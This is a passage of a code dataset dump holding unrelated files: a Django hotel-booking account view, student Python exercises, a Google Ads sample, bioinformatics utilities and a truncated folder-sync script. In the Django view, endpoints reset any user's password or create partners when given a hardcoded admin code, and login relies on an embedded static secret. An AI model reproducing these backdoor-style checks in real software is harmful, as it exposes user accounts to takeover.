DefaultJsonResponse(code=appcodes.CODE_100_OK, message=R.String.UPLOAD_SUCCESS)\n        else:\n            print(serializer.errors)\n            return DefaultJsonResponse(code=appcodes.CODE_NEGATIVE_100_APP_ERROR, message=str(serializer.errors))\n\n    @method_route(methods=['POST'], url_path='installation/bind', permission_classes=(IsAuthenticated,))\n    def bind_installationId(self, request, *args, **kwargs):\n        serializer = InstallationSerializer(data=request.data, )\n        if serializer.is_valid(raise_exception=True):\n            installation = serializer.save()\n            installation.user = request.user\n            installation.save(update_fields=('user',))\n            Installation.check_count_limit(user=request.user)\n        else:\n            return DefaultJsonResponse(code=appcodes.CODE_INSTALLATION_BIND_FAILED, message=serializer.errors)\n        return DefaultJsonResponse(code=appcodes.CODE_100_OK, message=\"success\")\n\n    @method_route(methods=['POST', ], url_path='avatar/update_callback')\n    def update_user_avatar_callback(self, request, *args, **kwargs):\n        \"\"\"\n        Flow: the client asks us for an upload token, uploads the image to Qiniu\n        with that token, and Qiniu then calls back our endpoint.\n        This endpoint is the callback Qiniu invokes after the upload finishes.\n        :param request:\n        :return:\n        \"\"\"\n        post_data = request.POST\n        f_name = post_data.get('filename')\n        f_size = post_data.get('filesize')\n        print('callback avatar name is {}'.format(f_name))\n        print('callback avatar f_size is {}'.format(f_size))\n        phone_number = re.match('avatar/avatar_(?P<id>\\d+).*', f_name).group('id')\n        print(phone_number)\n        try:\n            user = User.objects.get(phone_number=phone_number)\n            user.customermember.update_avatar_url(f_name)\n            print('update avatar success')\n        except User.DoesNotExist:\n            return 
Response('user does not exist')\n        return Response('OK')\n\n    @method_route(methods=['GET', ], url_path='avatar/token', permission_classes=(IsAuthenticated,))\n    def avatar_token(self, request, *args, **kwargs):\n        q = Auth(access_key, secret_key)\n        bucket_name = 'hotelbook'\n        phone_number = request.user.phone_number\n        imageName = 'avatar/avatar_' + str(phone_number) + '.jpg'\n        key = imageName\n        policy = {\n            'callbackUrl': 'agesd.com/user/avatar/update_callback/',\n            'callbackBody': 'filename=$(fname)&filesize=$(fsize)'\n        }\n\n        token = q.upload_token(bucket_name, key, 3600, policy)\n        return DefaultJsonResponse(code=appcodes.CODE_100_OK,\n                                   data={'upload_token': token, 'imageUrl': key})\n\n    @method_route(methods=['GET', ], url_path='profile', permission_classes=(IsAuthenticated,))\n    def get_profile(self, request, *args, **kwargs):\n        data = self.get_serializer_class()(request.user, ).data\n        return DefaultJsonResponse(data={'user': data})\n\n    def get_serializer_class(self):\n        if self.request.client_type == 'business':\n            return PartnerUserSerializer\n        elif self.request.client_type == 'client':\n            return CustomerUserSerializer\n\n    def _get_serialize_data(self, request, user):\n        if (user.is_partner_member and request.client_type == 'business'):\n            if not PartnerMember.objects.filter(user=user).exists():\n                PartnerMember(user=user).save()\n            return PartnerUserSerializer(user).data\n        elif (request.client_type == 'client'):\n            if user.is_partner_member and not CustomerMember.objects.filter(user=user).exists():\n                CustomerMember(user=user, ).save()\n            return CustomerUserSerializer(user).data\n        else:  # TODO: can this case actually occur?\n            raise exceptions.ConditionDenied(detail=R.String.PERMISSION_NO_POWER, code=-100)\n\n    @detail_route(methods=['GET', ], url_path='partner/invoice', permission_classes=(IsAuthenticated,))\n    def get_can_invoice(self, request, pk):\n        return DefaultJsonResponse(data={'invoice': request.user.partnermember.invoice})\n\n    @method_route(methods=[METHOD.POST, ], url_path='secretLogin')\n    def get_token(self, request, ):\n        phoneNumber = request.POST.get('phone_number')\n        timestamp = request.POST.get('timestamp')\n        secret_code = request.POST.get('secret_code')\n        import datetime\n        from datetime import timedelta\n        from chaolife.utils import cryptoutils\n        client_date = datetime.datetime.fromtimestamp(int(timestamp))\n        now_date = datetime.datetime.now()\n        pre_str = phoneNumber + ':' + timestamp + \":chaojimima132476\"\n        if now_date - client_date < timedelta(minutes=5) \\\n                and cryptoutils.rsa_decrypt(secret_code) == pre_str:\n            try:\n                user = User.objects.get(phone_number=phoneNumber)\n                token = Token.create_for_mobile_client(user=user, client_type=request.client_type)\n                response = DefaultJsonResponse(data={'user': self._get_serialize_data(request, user)})\n                response['token'] = token.key\n                return response\n            except User.DoesNotExist:\n                return DefaultJsonResponse(code=-100, message=R.String.VERTIFY_FAILED)\n        else:\n            return DefaultJsonResponse(code=-100, message=R.String.VERTIFY_FAILED)\n\n\n@permission_classes(IsAuthenticated, )\n@authentication_classes(TokenAuthentication, )\n@api_view(('POST',))\ndef client_user_login(request, ):\n    user = request.user\n    if user.is_customer_member:\n        pass\n    elif user.is_partner_member:\n        pass\n\n\n@api_view(('POST',))\ndef admin_changePassword(request, ):\n    if request.POST.get('admin') == '8995588':\n        phone_number = request.POST.get('phone_number')\n        print(phone_number)\n        user = User.objects.get(phone_number=phone_number)\n        user.set_password(request.POST.get('password'))\n        user.save()\n        
return Response('success')\n\n\n@api_view(('POST',))\ndef create_partner(request, ):\n    if request.POST.get('admin') == '8995588':\n        phone_number = request.POST.get('phone_number')\n        name = request.POST.get('name')\n        # deposit\n        points = request.POST.get('points')\n        with transaction.atomic():\n            try:\n                user = User.objects.get(phone_number=phone_number)\n                user.role = User.HOTEL_PARTNER\n                user.save()\n                if not PartnerMember.objects.filter(user=user).exists():\n                    PartnerMember.objects.create(user=user)\n                partnerMember = user.partnermember\n            except User.DoesNotExist:\n                user = User.objects.create(phone_number=phone_number, name=name, role=User.HOTEL_PARTNER)\n                print(user)\n                partnerMember = PartnerMember.objects.create(user=user)\n                CustomerMember.objects.create_for_exist_user(user)\n            partnerMember.deposit_points = points\n            partnerMember.save(update_fields=('deposit_points',))\n        return Response('success')\n    else:\n        return Response('滚')\n","sub_path":"chaolife/account/views/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":17016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"192049734","text":"#Hamlet.py\ndef main():\n    txt = getText(\"Hamlet.txt\")\n    counts = {}\n    item = Statistics(txt, counts)\n    printInfo(item)\n\ndef getText(file):\n    f = open(file, \"r\")\n    txt = f.read()\n    txt = txt.lower()\n    for ch in '~!@#$%^&*()_+|}{:?><\",./;[]\\=-`':\n        txt = txt.replace(ch, \"\")  # str.replace returns a new string; reassign it\n    f.close()\n    return txt\n\ndef Statistics(txt, counts):\n    words = txt.split()\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    item = list(counts.items())\n    item.sort(key = lambda x:x[1], reverse = True)  # sort by frequency, descending\n    return item\n\ndef printInfo(item):\n    for i in range(10):\n        word, count = item[i]\n        print(\"{:<10} {:>5}\".format(word, count))\nmain()\n","sub_path":"1《Python语言程序设计基础(第2版)》MOOC/第六章_组合数据类型/Hamlet.py","file_name":"Hamlet.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"601785606","text":"import argparse\nimport math\nimport numpy as np\nimport os\nimport random\n# import sympy as sp\nfrom helpers import save, load\nfrom ProblemInstances import find_derivatives\nfrom wdnf import Taylor\n# from ProblemInstances import DiversityReward, QueueSize, InfluenceMaximization, FacilityLocation, derive\n# from scipy.misc import derivative\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use('Agg')\n\n\n# def taylor(fun, degree, center):\n#     estimated_fun = [((fun.diff(x, i).subs(x, center)) * (x - center)**i) / math.factorial(i)\n#                      for i in range(degree + 1)]\n#     estimated_fun = sum(estimated_fun)\n#     return estimated_fun\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='Test Module for ...',\n                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument('--problem', type=str, help='If the problem instance is created before, provide it here to save'\n                                                    ' time instead of recreating it.')\n    args = parser.parse_args()\n    num_of_samples = 100\n    # graphs = load('datasets/one_graph_file')\n    newProblem = load(args.problem)  # InfluenceMaximization(graphs, 1)\n\n    # print(\"g^2(x) is: \" + str((g**2).coefficients))\n\n    # x = sp.Symbol('x')\n    # f = sp.ln(x + 1)\n    # x_lims = [0, 1]\n    vectors = []\n    for n in range(num_of_samples):\n        # list(...) so the bits can be padded and zipped below (map() alone is a one-shot iterator)\n        binary_vector = list(map(int, bin(random.getrandbits(newProblem.problemSize))[2:]))\n        if len(binary_vector) < newProblem.problemSize:\n            binary_vector = [0] * (newProblem.problemSize - 
len(binary_vector)) + binary_vector\n        # random_list = random.getrandbits(newProblem.problemSize)\n        y = dict(zip(newProblem.groundSet, binary_vector))\n        vectors.append(y)\n    # x1 = [{1: 0.0, 2: 0.0, 3: 0.0}, {1: 0.0, 2: 0.0, 3: 1.0}, {1: 0.0, 2: 1.0, 3: 0.0}, {1: 0.0, 2: 1.0, 3: 1.0},\n    #       {1: 1.0, 2: 0.0, 3: 0.0}, {1: 1.0, 2: 0.0, 3: 1.0}, {1: 1.0, 2: 1.0, 3: 0.0}, {1: 1.0, 2: 1.0, 3: 1.0}]\n    # y1 = []\n    center = 0.5\n    degrees = range(1, 11)\n    avg_errs = []\n    for j in degrees:\n        expanded_f = newProblem.get_polynomial_estimator(0.5, j).my_wdnf\n        # print('expanded f at degree = ' + str(j) + ' is ' + str(expanded_f.coefficients))\n        # for g in newProblem.wdnf_dict:\n        # fun = taylor(f, j, 0.5)\n        # print(sp.expand(fun))\n        # y1 = [fun.subs(x, k) for k in x1]\n        derivatives = find_derivatives(np.log1p, center, j)\n        my_taylor = Taylor(j, derivatives, center)\n        error = 0.0\n        for y in vectors:\n            # print('for x = ' + str(y))\n            # print('expanded f at n = ' + str(j) + ' is ' + str(expanded_f(y)))\n            # print('f at n = ' + str(j) + ' is ' + str(fun.subs(x, g(y))))\n            final_value = [(1.0 / newProblem.instancesSize) * my_taylor(newProblem.wdnf_dict[g](y)) for g in\n                           range(newProblem.instancesSize)]\n            final_value = sum(final_value)\n            error += abs(expanded_f(y) - final_value)\n        error = error / num_of_samples\n        avg_errs.append(error)\n        print('Average error at L = ' + str(j) + ' is ' + str(error))\n    output_dir = 'results/plots/tests/taylor/'\n    if not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n    plt.figure()\n    plt.plot(degrees, avg_errs)\n    plt.xlabel('L')\n    plt.ylabel(r'$\\frac{1}{n} \\sum |\\tilde{f}(x) - \\hat{f_L}(g(x))|$')\n    plt.title(r'Average error between $\\tilde{f}(x)$ and $\\hat{f_L}(g(x))$')\n    plt.savefig(output_dir + 'AvgErrExpTaylorApprox.png', bbox_inches=\"tight\")\n    plt.show()","sub_path":"code/ExpandedTaylorApproximator.py","file_name":"ExpandedTaylorApproximator.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"634590785","text":"from .exceptions import *\n\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\"cool\", \"awesome\", \"crazy\"]\n\n\ndef _get_random_word(list_of_words):\n    if len(list_of_words) == 0:\n        raise InvalidListOfWordsException()\n    \n    if len(list_of_words) == 1:\n        return list_of_words[0]\n    else: \n        rnd = random.randint(0,len(list_of_words)-1)\n        return list_of_words[rnd]\n\n\ndef _mask_word(word):\n    if len(word) == 0:\n        raise InvalidWordException()\n    \n    \n    return \"*\" * len(word)\n\n\ndef _uncover_word(answer_word, masked_word, character):\n    if answer_word == \"\" or masked_word == \"\":\n        raise InvalidWordException()\n    \n    elif len(character) > 1:\n        raise InvalidGuessedLetterException()\n    \n    elif len(answer_word) != len(masked_word):\n        raise InvalidWordException()\n    \n    \n    word = \"\"\n    if character.lower() in answer_word.lower():\n        for i in range(len(answer_word)):\n            if answer_word[i].lower() == character.lower():\n                word += character.lower()\n            else:\n                word += masked_word[i].lower()\n    else: \n        word = masked_word\n\n    return word\n    \n    \n\n\ndef guess_letter(game, letter):\n    if game[\"answer_word\"] == game[\"masked_word\"]:\n        raise GameFinishedException()\n    if game[\"remaining_misses\"] == 0:\n        raise GameFinishedException()\n    \n    word = game[\"masked_word\"]\n    \n    game[\"masked_word\"] = _uncover_word(game[\"answer_word\"], game[\"masked_word\"], letter)\n    \n    if word == game[\"masked_word\"]:\n        game[\"remaining_misses\"] -= 1\n    \n    letter = 
letter.lower()\n    game[\"previous_guesses\"].append(letter)\n    \n    if game[\"masked_word\"] == game[\"answer_word\"]:\n        raise GameWonException()\n    if game[\"remaining_misses\"] == 0:\n        raise GameLostException()\n    \n    return game\n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n    if list_of_words is None:\n        list_of_words = LIST_OF_WORDS\n\n    word_to_guess = _get_random_word(list_of_words)\n    masked_word = _mask_word(word_to_guess)\n    game = {\n        'answer_word': word_to_guess,\n        'masked_word': masked_word,\n        'previous_guesses': [],\n        'remaining_misses': number_of_guesses,\n    }\n\n    return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"652845416","text":"# 1_ (CHALLENGE) Write a program that, given “x” seconds provided by the user, reports the corresponding hours, minutes and seconds.\r\n\r\n# Answer:\r\n\r\nimport math\r\n\r\nprint('Esse programa transforma o valor X que sera o valor de segundos e dividira o valor entre horas, minutos e segundos.')\r\n\r\nX = int(input('O valor de X em segundos e igual a: '))\r\n\r\nHORAS = math.floor(X / 60 ** 2) \r\n\r\nRESTO_DAS_HORAS = X % 60 ** 2\r\n\r\nMINUTOS = math.floor(RESTO_DAS_HORAS / 60)\r\n\r\nSEGUNDOS = RESTO_DAS_HORAS % 60\r\n\r\nprint('São', HORAS, 'horas,', MINUTOS, 'minutos e', SEGUNDOS, 'segundos.')","sub_path":"Segundo Capítulo/EXERCÍCIOS_12.py","file_name":"EXERCÍCIOS_12.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"89787847","text":"#!/usr/bin/env python\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Demonstrates how to search for language and mobile carrier constants.\n\nSpecifically, this example illustrates how to:\n1. Search for language constants where the name includes a given string.\n2. 
Search for all the available mobile carrier constants with a given country\n code.\n\"\"\"\n\n\nimport argparse\nimport sys\n\nfrom google.ads.googleads.client import GoogleAdsClient\nfrom google.ads.googleads.errors import GoogleAdsException\n\n\ndef main(client, customer_id, language_name, carrier_country_code):\n \"\"\"Demonstrates how to search for language and mobile carrier constants.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n language_name: String included in the language name to search for.\n carrier_country_code: String code of the country where the mobile\n carriers are located.\n \"\"\"\n search_for_language_constants(client, customer_id, language_name)\n search_for_carrier_constants(client, customer_id, carrier_country_code)\n\n\ndef search_for_language_constants(client, customer_id, language_name):\n \"\"\"Searches for language constants where the name includes a given string.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n language_name: String included in the language name to search for.\n \"\"\"\n # Get the GoogleAdsService client.\n googleads_service = client.get_service(\"GoogleAdsService\")\n\n # Create a query that retrieves the language constants where the name\n # includes a given string.\n query = f\"\"\"\n SELECT\n language_constant.id,\n language_constant.code,\n language_constant.name,\n language_constant.targetable\n FROM language_constant\n WHERE language_constant.name LIKE '%{language_name}%'\"\"\"\n\n # Issue a search request and process the stream response to print the\n # requested field values for the carrier constant in each row.\n stream = googleads_service.search_stream(\n customer_id=customer_id, query=query\n )\n\n for batch in stream:\n for row in batch.results:\n print(\n f\"Language with ID {row.language_constant.id}, \"\n f\"code '{row.language_constant.code}', \"\n f\"name '{row.language_constant.name}', \"\n f\"and targetable '{row.language_constant.targetable}' \"\n \"was found.\"\n )\n\n\ndef search_for_carrier_constants(client, customer_id, carrier_country_code):\n \"\"\"Searches for mobile carrier constants with a given country code.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n carrier_country_code: String code of the country where the mobile\n carriers are located.\n \"\"\"\n # Get the GoogleAdsService client.\n googleads_service = client.get_service(\"GoogleAdsService\")\n\n # Create a query that retrieves the targetable carrier constants by country\n # code.\n query = f\"\"\"\n SELECT\n carrier_constant.id,\n carrier_constant.name,\n carrier_constant.country_code\n FROM carrier_constant\n WHERE carrier_constant.country_code = '{carrier_country_code}'\"\"\"\n\n # Issue a search request and process the stream response to print the\n # requested field values for the carrier constant in each row.\n stream = googleads_service.search_stream(\n customer_id=customer_id, query=query\n )\n\n for batch in stream:\n for row in batch.results:\n print(\n f\"Carrier with ID {row.carrier_constant.id}, \"\n f\"name '{row.carrier_constant.name}', \"\n f\"and country code '{row.carrier_constant.country_code}' \"\n \"was found.\"\n )\n\n\nif __name__ == \"__main__\":\n # GoogleAdsClient will read the google-ads.yaml configuration file in the\n # home directory if none is specified.\n googleads_client = GoogleAdsClient.load_from_storage(version=\"v14\")\n\n parser = 
argparse.ArgumentParser(\n        description=(\n            \"Demonstrates how to search for language and mobile carrier \"\n            \"constants.\"\n        )\n    )\n    # The following argument(s) should be provided to run the example.\n    parser.add_argument(\n        \"-c\",\n        \"--customer_id\",\n        type=str,\n        required=True,\n        help=\"The Google Ads customer ID.\",\n    )\n    parser.add_argument(\n        \"-l\",\n        \"--language_name\",\n        type=str,\n        required=False,\n        default=\"eng\",\n        help=\"Optional, string included in the language name to search for.\",\n    )\n    parser.add_argument(\n        \"-p\",\n        \"--carrier_country_code\",\n        type=str,\n        required=False,\n        default=\"US\",\n        help=(\n            \"Optional, string code of the country where the mobile carriers \"\n            \"are located, e.g. 'US', 'ES', etc. \"\n            \"A list of country codes can be referenced here: \"\n            \"https://developers.google.com/google-ads/api/reference/data/geotargets\"\n        ),\n    )\n    args = parser.parse_args()\n\n    try:\n        main(\n            googleads_client,\n            args.customer_id,\n            args.language_name,\n            args.carrier_country_code,\n        )\n    except GoogleAdsException as ex:\n        print(\n            f'Request with ID \"{ex.request_id}\" failed with status '\n            f'\"{ex.error.code().name}\" and includes the following errors:'\n        )\n        for error in ex.failure.errors:\n            print(f'\\tError with message \"{error.message}\".')\n            if error.location:\n                for field_path_element in error.location.field_path_elements:\n                    print(f\"\\t\\tOn field: {field_path_element.field_name}\")\n        sys.exit(1)\n","sub_path":"examples/targeting/search_for_language_and_carrier_constants.py","file_name":"search_for_language_and_carrier_constants.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"471686917","text":"import logging\nimport os\nimport subprocess\nimport glob\n\ndef setLogger(mode, module):\n    \"\"\"Define the logger that we will use.\"\"\"\n\n    # create a logger for the given module\n    logger = logging.getLogger(module)\n    logger.setLevel(logging.DEBUG)\n\n    log = logging.StreamHandler()\n\n    # Select the mode\n    if mode == 'Debug':\n        log.setLevel(level=logging.DEBUG)\n    elif mode == 'Production':\n        log.setLevel(level=logging.INFO)\n\n    formatter = logging.Formatter('#[%(levelname)s] - %(name)s - %(message)s')\n    log.setFormatter(formatter)\n\n    logger.addHandler(log)\n\n    # read database here\n    logger.info(\"Entering \" + mode + \" mode\")\n\n    return(logger)\n\n\ndef setMode(args):\n    if args.d:\n        mode = 'Debug'\n    else:\n        mode = 'Production'\n\n    return(mode)\n\n\ndef check_input(starting_files, logger):\n    if type(starting_files) == str:\n        if not os.path.exists(starting_files):\n            logger.error('Input file does not exist -> ' + starting_files)\n            exit(1)\n\n    elif type(starting_files) == list:\n        for in_file in starting_files:\n            if not os.path.exists(in_file):\n                logger.error('Input file does not exist -> ' + in_file)\n                exit(1)\n\n\ndef run_cmd(cmd, output=0):\n    if output != 0:\n        process = subprocess.Popen(cmd, shell=True, executable='/bin/bash', stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        out = process.stdout.readline()\n        out = out.decode(\"utf-8\").strip('\\n')\n\n    else:\n        try:\n            os.system(cmd)\n        except Exception:\n            raise Exception(\"Command failed: \" + cmd + \"\\n\")\n\n\ndef get_build_for_reference_genome(args, logger):\n    \"\"\"\n    Function that checks the arguments and retrieves the build of the\n    reference genome to use for the analysis.\n\n    If none is provided, use GRCh37.\n    \"\"\"\n    if args.build is None:\n        return('GRCh37')\n    else:\n        if args.build in ['GRCh38', 
'GRCh37']:\n return(args.build)\n else:\n logger.error('Build ' + args.build + ' not found')\n logger.error('Exiting...')\n exit(1)\n\n\ndef check_config_paths(config, logger):\n for software in config['software']['paths'].keys():\n path = config['software']['paths'][software]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Software does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n for reference in config['ref']:\n path = config['ref'][reference]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Reference does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n for db in config['dbs']:\n path = config['dbs'][db]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Database does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n\n\ndef get_standard_config(config, init_conf, logger):\n\n NGS_SOFTWARE_BIN = init_conf['BIN_BIOTOOLS']\n\n config['ref'] = {\n # Ref Genomes\n \"GRCh38\": os.path.join(init_conf['REFGENOMES'], 'hs38', 'hs38.fa'),\n \"GRCh37\": os.path.join(init_conf['REFGENOMES'], 'hd37d5', 'hs37d5.fa')\n }\n\n config['software'] = {}\n config['software']['paths'] = {\n \"BWAPATH\": os.path.join(NGS_SOFTWARE_BIN, 'bwa'),\n \"SAMTOOLSPATH\": os.path.join(NGS_SOFTWARE_BIN, 'samtools'),\n \"FREEBAYESPATH\": os.path.join(NGS_SOFTWARE_BIN, 'freebayes'),\n \"FASTQCPATH\": os.path.join(NGS_SOFTWARE_BIN, 'fastqc'),\n \"PICARDPATH\": os.path.join(NGS_SOFTWARE_BIN, 'picard.jar'),\n \"ANNOVARPATH\": os.path.join(NGS_SOFTWARE_BIN, 'table_annovar.pl'),\n #\"BEDTOOLSPATH\": os.path.join(NGS_SOFTWARE_BIN, 'bedtools'),\n }\n\n config['dbs'] = {\n \"ANNOVARINFO\": os.path.join(NGS_SOFTWARE_BIN, 'annov_humandb'),\n }\n\n logger.debug(config)\n\n return(config)\n\ndef get_aditional_config(args, config, logger):\n config['conf'] = {}\n config['conf']['build'] = get_build_for_reference_genome(args)\n\n return(config)\n\n\ndef joinPath(pathItems):\n\n path = os.path.join(*pathItems)\n\n return(sanitisePath(path))\n\ndef sanitisePath(path):\n \"\"\" normalize and remove trailing slashes in paths\"\"\"\n return (os.path.normpath(path))\n\n\ndef check_excel_file(logger):\n return()\n\n\ndef recover_fastq_files(args, config, logger):\n\n fastq_folder = args.fastq_fold\n\n if not os.path.exists(fastq_folder):\n logger.warn('Input fastq files does not exists -> ' + fastq_folder)\n logger.warn('Exiting...')\n exit(1)\n\n input_fastq_files = glob.glob(os.path.join(fastq_folder, '*'))\n\n if len(input_fastq_files) < 2:\n logger.warn('List of fastq files recovered has fewer than 2 files -> ' + str(input_fastq_files))\n logger.warn('Exiting...')\n exit(1)\n\n return(input_fastq_files)\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198483632","text":"#!/usr/bin/env python3\nimport sys, random\n\nassert sys.version_info >= (3,7), \"This script requires at least Python 3.7\"\n\n\nprint('Greetings!') # greets the player\ncolors = ['red','orange','yellow','green','blue','violet','purple'] # establishes all of those colors as possible answers\nplay_again = '' # allows the player the choice to play the game again\nbest_count = sys.maxsize # the biggest number\n\nwhile (play_again != 'n' and play_again != 'no'): # in the instance the player chooses not to play again by typing 'no' or 'n'\n match_color = random.choice(colors) # makes the 
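A note on `setLogger` in the utils module above: `if mode is 'Debug'` compares object identity, not string equality. It only works when CPython happens to intern the literal, and CPython 3.8+ emits a SyntaxWarning for it. A minimal corrected sketch:

```python
import logging

log = logging.StreamHandler()
mode = 'Debug'

# `is` tests identity; string comparison needs `==`. The original check also
# silently leaves the handler at its default level for any unexpected mode.
if mode == 'Debug':
    log.setLevel(logging.DEBUG)
elif mode == 'Production':
    log.setLevel(logging.INFO)
```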
right answer random out of the given color options\n count = 0 # number of tries is zero\n color = '' # players choose which color they think is correct\n while (color != match_color):\n color = input(\"\\nWhat is my favorite color? \") #\\n is a special code that adds a new line\n color = color.lower().strip() # makes it so entries are not incorrect for capitalization or additional spaces\n count += 1 # counts the number of guesses the player uses\n if (color == match_color): # describes the instance the player guesses the right color\n print('Correct!') # the result if the player guesses right\n else: # describes the instance the player guesses incorrectly\n print('Sorry, try again. You have guessed {guesses} times.'.format(guesses=count)) # the result if the player is wrong\n \n print('\\nYou guessed it in {} tries!'.format(count)) # tells the player how many guesses they used after the game\n\n if (count < best_count): # tells the player whether they guess in less tries than before\n print('This was your best guess so far!') # lets the player know this was the try they used the least amojunt of guesses\n best_count = count # allows program to remember this try as the best one so far\n\n play_again = input(\"\\nWould you like to play again (yes or no)? \").lower().strip() # gives player the option of trying again\n\nprint('Thanks for playing!') # closing statement befoe game ends","sub_path":"main10.py","file_name":"main10.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"470716659","text":"import ctypes\nimport os\nimport shutil\nimport stat\nimport sys\nimport time\nimport traceback\n\nLOG_DIR_PATH = \"C:\\\\Users\\\\Nic\\\\Documents\\\\Mine\\\\Coding\\\\file-copier\\\\logs\\\\\"\n\n\n# copies the contents of root_src_dir to root_dst_dir\n# files will only be overridden if they are more recently modified\n# files in root_dst_dir that aren't in root_src_dir will be deleted\ndef sync_folders(root_src_dir, root_dst_dir, log_only=False, force_delete=False, print_actions=False, log_visits=False):\n logger = Logger(LOG_DIR_PATH, force_delete=force_delete, print_actions=print_actions, log_visits=log_visits)\n try:\n logger.log(\"** Syncing %s with %s... **\" % (root_src_dir, root_dst_dir))\n logger.log(\"** Merging folders... **\")\n merge_folders(root_src_dir, root_dst_dir, logger, log_only, force_delete)\n logger.log(\"** Cleaning up destination folder... 
**\")\n delete_nonexistent_files(root_src_dir, root_dst_dir, logger, log_only, force_delete)\n except:\n error_occurred(logger)\n raise\n finally:\n print(\"Closing logger...\")\n logger.close()\n\n\n# copies the contents of root_src_dir to root_dst_dir\n# files will only be overridden if they are more recently modified\ndef merge_folders(root_src_dir, root_dst_dir, logger, log_only, force_delete):\n for src_dir, dirs, files in os.walk(root_src_dir):\n dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)\n logger.log(\"Comparing folders {}...\".format(src_dir.replace(root_src_dir, \"\")), visit=True)\n\n logger.log(\"Checking folder {} exists...\".format(dst_dir), visit=True)\n if not os.path.exists(dst_dir):\n logger.log(\"Creating folder %s\" % dst_dir)\n if not log_only:\n os.makedirs(dst_dir)\n\n for file in files:\n logger.log(\"Looking for file {}...\".format(file), visit=True)\n src_file = os.path.join(src_dir, file)\n dst_file = os.path.join(dst_dir, file)\n\n if os.path.exists(dst_file):\n src_modified_time = os.stat(src_file).st_mtime\n dst_modified_time = os.stat(dst_file).st_mtime\n # replace file if it's older\n if dst_modified_time < src_modified_time:\n logger.log(\"Overwriting %s with %s \" % (dst_file, src_file))\n if not log_only:\n remove_file(dst_file, force_delete)\n shutil.copy2(src_file, dst_dir)\n else:\n logger.log(\"Copying file %s to \\n\\t%s\" % (src_file, dst_dir))\n if not log_only:\n shutil.copy2(src_file, dst_dir)\n\n\n# delete files and folders in root_dst_dir that aren't in root_src_dir\ndef delete_nonexistent_files(root_src_dir, root_dst_dir, logger, log_only, force_delete):\n for dst_dir, dirs, files in os.walk(root_dst_dir):\n logger.log(\"Checking folder {}...\".format(dst_dir.replace(root_src_dir, \"\")), visit=True)\n\n src_dir = dst_dir.replace(root_dst_dir, root_src_dir, 1)\n\n for file in files:\n logger.log(\"Checking file {}...\".format(file), visit=True)\n\n src_file = os.path.join(src_dir, file)\n dst_file = os.path.join(dst_dir, file)\n\n if not os.path.exists(src_file):\n logger.log(\"Removing file \" + dst_file)\n if not log_only:\n remove_file(dst_file, force_delete)\n\n if not os.path.exists(src_dir):\n logger.log(\"Removing folder and contents \" + dst_dir)\n if not log_only:\n shutil.rmtree(dst_dir, onerror=remove_readonly if force_delete else None)\n\n\ndef remove_readonly(func, path, excinfo):\n os.chmod(path, stat.S_IWRITE)\n for root, dirs, files in os.walk(path):\n for file_name in files:\n full_path = os.path.join(root, file_name)\n os.chmod(full_path, stat.S_IWRITE)\n func(path)\n\n\ndef remove_file(path, force_delete):\n try:\n os.remove(path)\n except PermissionError:\n if force_delete:\n os.chmod(path, stat.S_IWRITE)\n os.remove(path)\n else:\n raise\n\n\ndef error_occurred(logger):\n logger.log_error()\n message_box = ctypes.windll.user32.MessageBoxW(\n 0,\n logger.error_message(),\n \"Folder sync error\",\n 0x5)\n if message_box == 4:\n # retry clicked\n sync_folders(source_directory, destination_directory, logger, force_delete=True)\n\n\nclass Logger:\n def __init__(self, log_dir_path, print_actions=False, force_delete=False, log_visits=False):\n self.print_actions = print_actions\n self.force_delete = force_delete\n self.log_visits = log_visits\n\n self.most_recent_action = None\n\n time_str = time.strftime('%H.%M-%d-%b-%Y')\n self.log_file_name = \"log-\" + time_str + \".txt\"\n self.error_file_name = \"error-\" + time_str + \".txt\"\n\n if force_delete:\n self.log_file_name = 